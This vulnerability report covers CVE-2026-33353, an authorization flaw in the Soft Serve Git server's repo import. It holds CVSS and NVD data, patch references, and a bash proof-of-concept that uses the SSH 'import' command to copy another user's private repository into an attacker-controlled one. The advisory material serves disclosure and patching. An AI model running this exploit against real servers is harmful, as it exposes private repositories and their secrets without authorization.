Security Vulnerability Report
CVE-2026-33353 CVSS 6.5 MEDIUM

CVE-2026-33353

Published: 2026-03-24 20:16:30
Last Modified: 2026-03-25 21:59:39

Description

Soft Serve is a self-hostable Git server for the command line. From version 0.6.0 to before version 0.11.6, an authorization flaw in repo import allows any authenticated SSH user to clone a server-local Git repository, including another user's private repo, into a new repository they control. This issue has been patched in version 0.11.6.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:* - VULNERABLE
Soft Serve >= 0.6.0
Soft Serve < 0.11.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-33353: Soft Serve Authorization Bypass
# Description: Exploit the repo import feature to clone a private repository.

TARGET_HOST="vulnerable.example.com"
TARGET_USER="git"

# The private repo we want to steal (path on the server)
PRIVATE_REPO="admin/private-config"

# The name of the new repo we will create
NEW_REPO_NAME="stolen-config"

echo "[*] Attempting to exploit CVE-2026-33353 against ${TARGET_HOST}"
echo "[*] Targeting private repo: ${PRIVATE_REPO}"

# Soft Serve uses SSH for interaction.
# The 'import' command is the vulnerable vector.
# Usage: ssh git@host import <source> <dest>
# In vulnerable versions, <source> can be any local repo.
ssh "${TARGET_USER}@${TARGET_HOST}" import "${PRIVATE_REPO}" "${NEW_REPO_NAME}"

if [ $? -eq 0 ]; then
    echo "[+] Exploit successful! Private repo cloned to ${NEW_REPO_NAME}"
    echo "[+] You can now clone it locally using:"
    echo "    git clone ssh://${TARGET_USER}@${TARGET_HOST}/${NEW_REPO_NAME}"
else
    echo "[-] Exploit failed. Target might be patched or credentials invalid."
fi

References

https://github.com/charmbracelet/soft-serve/commit/c147421caf234bcfc1570c79d728ecbbe5813e55 (Patch)
https://github.com/charmbracelet/soft-serve/releases/tag/v0.11.6 (Product, Release Notes)
https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-xgxp-f695-6vrp (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33353", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:29.573", "lastModified": "2026-03-25T21:59:38.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soft Serve is a self-hostable Git server for the command line. From version 0.6.0 to before version 0.11.6, an authorization flaw in repo import allows any authenticated SSH user to clone a server-local Git repository, including another user's private repo, into a new repository they control. This issue has been patched in version 0.11.6."}, {"lang": "es", "value": "Soft Serve es un servidor Git autoalojable para la línea de comandos. Desde la versión 0.6.0 hasta antes de la versión 0.11.6, una falla de autorización en la importación de repositorios permite a cualquier usuario SSH autenticado clonar un repositorio Git local del servidor, incluyendo el repositorio privado de otro usuario, en un nuevo repositorio que ellos controlan. Este problema ha sido parcheado en la versión 0.11.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:*", "versionStartIncluding": "0.6.0", "versionEndExcluding": "0.11.6", "matchCriteriaId": "EDBD42A1-C2A7-4A84-AA41-6317A9812FF7"}]}]}], "references": [{"url": "https://github.com/charmbracelet/soft-serve/commit/c147421caf234bcfc1570c79d728ecbbe5813e55", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/charmbracelet/soft-serve/releases/tag/v0.11.6", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-xgxp-f695-6vrp", "source": "[email protected]", "tags": 
["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-xgxp-f695-6vrp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}